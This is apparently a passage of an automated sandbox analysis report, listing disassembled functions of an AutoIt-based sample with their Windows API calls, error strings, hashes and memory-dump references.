                                                                                                                                                                                                                                                                                                    • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 263f0672bdc2175aca1c15ba842b55f06b773a6d20f78e4b4e5781361dc58e08
                                                                                                                                                                                                                                                                                                    • Instruction ID: d081ce7ff3ca0fe92fa6b9d1bbb5763be376d1a5cb8e56ea6c1c7a5babc5f820
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 263f0672bdc2175aca1c15ba842b55f06b773a6d20f78e4b4e5781361dc58e08
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 194190A5D10214B5EB11FBB89C8AACFB7ACAF05310F51A462E50CF3161FA34E255C7E6
                                                                                                                                                                                                                                                                                                    Function 00EB379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00EB37B7
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00EB37BF
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EB37CA
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00EB37D6
                                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EB3812
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EB3823
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EB6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00EB385E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EB387D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f9783338ebd6ba8ef41e4eecd98f342735dae263c55f2a7c97a5f754fabf9058
                                                                                                                                                                                                                                                                                                    • Instruction ID: 40948e0bdee20f8b38ab9d6c7098893ac6b632f94d4108c1c2b9c71cd21b95f9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9783338ebd6ba8ef41e4eecd98f342735dae263c55f2a7c97a5f754fabf9058
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31C072205224BFEB154F55CC8AFEB3BADEF09715F040065FE08EA291D6B59C41CBA0
                                                                                                                                                                                                                                                                                                    Function 00EA5A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                                    • Opcode ID: a931b1cdca6525b8fce7be9522595f93d2a9bf329e543c6aad7a02b2bf915449
                                                                                                                                                                                                                                                                                                    • Instruction ID: 331ccc5235727dbcb1754cf4dcd2c09ade3364441ac4d27874045c02d81018b0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a931b1cdca6525b8fce7be9522595f93d2a9bf329e543c6aad7a02b2bf915449
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0D1D172A0070A9FDF10CF68C885AAEB7B5FF49318F149169E915BB280E770ED45CB60
                                                                                                                                                                                                                                                                                                    Function 00E618A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00E61B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00E6194E
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E619D1
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00E61B7B,?,00E61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E61A64
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E61A7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E53B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E46A79,?,0000015D,?,?,?,?,00E485B0,000000FF,00000000,?,?), ref: 00E53BC5
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00E61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E61AF7
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E61B22
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E61B2E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 034d5fc738db64a52f32ffd27a8c00ef9783ef94651e13a934df3a622cce4d6e
                                                                                                                                                                                                                                                                                                    • Instruction ID: bd393a9b38dd241f3469cc92ad1cd489b3c47f5149e85ebde0b274d13786a593
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 034d5fc738db64a52f32ffd27a8c00ef9783ef94651e13a934df3a622cce4d6e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D910672E802569EDB268EA4EC51AEE7BF5DF49394F1C2699E801F7140E735CC44CB60
                                                                                                                                                                                                                                                                                                    Function 00EA4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                    • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                                    • Opcode ID: d5c648008e671b2c34902d17e5c142e224b78c477dd6e5f4a4bc775a1b43e037
                                                                                                                                                                                                                                                                                                    • Instruction ID: d6f685546905423a83992c56f2ac2625f5a6ac3182eb5ee89fa5e9da66a05886
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5c648008e671b2c34902d17e5c142e224b78c477dd6e5f4a4bc775a1b43e037
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2891AF72A00619ABCF20CFA5DC84FAFBBB8AF5A314F109559F505BF240D770A905CBA0
                                                                                                                                                                                                                                                                                                    Function 00E91B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00E91C1B
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E91C43
                                                                                                                                                                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00E91C67
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E91C97
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E91D1E
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E91D83
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E91DEF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c08bfd9d3b0177de937f9d739e7a956dbb660c9c5b5074f3666e51e7bc4ad002
                                                                                                                                                                                                                                                                                                    • Instruction ID: 743a729655874fad081b5a9688779b771572c61a74c7a7e662479ac739769a9f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c08bfd9d3b0177de937f9d739e7a956dbb660c9c5b5074f3666e51e7bc4ad002
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F491EE75A0021AAFEF059FA4D884BFEB7B4FF04725F1050A9E950BB291E774A944CB90
                                                                                                                                                                                                                                                                                                    Function 00EA43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00EA43C8
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00EA44D7
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EA44E7
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00EA467C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E9169E: VariantInit.OLEAUT32(00000000), ref: 00E916DE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E9169E: VariantCopy.OLEAUT32(?,?), ref: 00E916E7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E9169E: VariantClear.OLEAUT32(?), ref: 00E916F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4b092e6a511101c4e73a7942a763a6cbb2130bd5fa54c66540b67f0436e3b0b8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9f0a4bd1e87c459f52d2a72b9d26747b30986b8505545a02f21567068608e666
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b092e6a511101c4e73a7942a763a6cbb2130bd5fa54c66540b67f0436e3b0b8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 289146B5A083019FC704EF24C48096AB7E5BF89714F14996DF89AAB391DB71ED05CB82
                                                                                                                                                                                                                                                                                                    Function 00EA560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E808FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?,?,00E80C4E), ref: 00E8091B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E808FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?), ref: 00E80936
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E808FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?), ref: 00E80944
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E808FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?), ref: 00E80954
                                                                                                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00EA56AE
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EA57B6
                                                                                                                                                                                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00EA582C
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00EA5837
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                    • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                                    • Opcode ID: 25d23d4bc7c9efe619346c44eb11863775d5c2234eef35cedb07383a6dc006ef
                                                                                                                                                                                                                                                                                                    • Instruction ID: 868b0c25202d1af72501b16cc1bd7729aed79454771e0516cd8084ec5e47d543
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25d23d4bc7c9efe619346c44eb11863775d5c2234eef35cedb07383a6dc006ef
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A91F672D00629EBDF14DFA4DC81AEEB7B8BF08314F10556AE515BB251EB34AA44CF60
                                                                                                                                                                                                                                                                                                    Function 00EB2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 00EB2C1F
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00EB2C51
                                                                                                                                                                                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EB2C79
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB2CAF
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00EB2CE9
                                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,?), ref: 00EB2CF7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E843AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: GetCurrentThreadId.KERNEL32 ref: 00E843B4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E82F00), ref: 00E843BB
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EB2D7F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8F292: Sleep.KERNEL32 ref: 00E8F30A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2ccbaca58fd001ec793faffafc6d2aa313d6423c8667ede8d5f432b0ce70581b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8759826279dc3303d940e3ad2011af589dc9e13fe7ff717c53b54726f31c95c9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ccbaca58fd001ec793faffafc6d2aa313d6423c8667ede8d5f432b0ce70581b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA718A75A00215AFCB10EF64D885AEEBBF1EF48314F149469E91AFB351DB34AE418F90
                                                                                                                                                                                                                                                                                                    Function 00E8B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00E8B8C0
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00E8B8D5
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00E8B936
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E8B964
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E8B983
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E8B9C4
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E8B9E7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 104959a7ead0e317ce84daa6db7968d8cf02083996bc3efbb6f50dabcc24fd2f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1b339b8f11b564c188abc92ff6764b3bc53e09432a480d37115134ded55b23cc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 104959a7ead0e317ce84daa6db7968d8cf02083996bc3efbb6f50dabcc24fd2f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B35103A05087D53EFB366234CC55BBA7EA95F46308F08A489E1DDA58D2D3D8ECC8D750
                                                                                                                                                                                                                                                                                                    Function 00E8B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 00E8B6E0
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00E8B6F5
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00E8B756
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E8B782
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E8B79F
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E8B7DE
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E8B7FF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
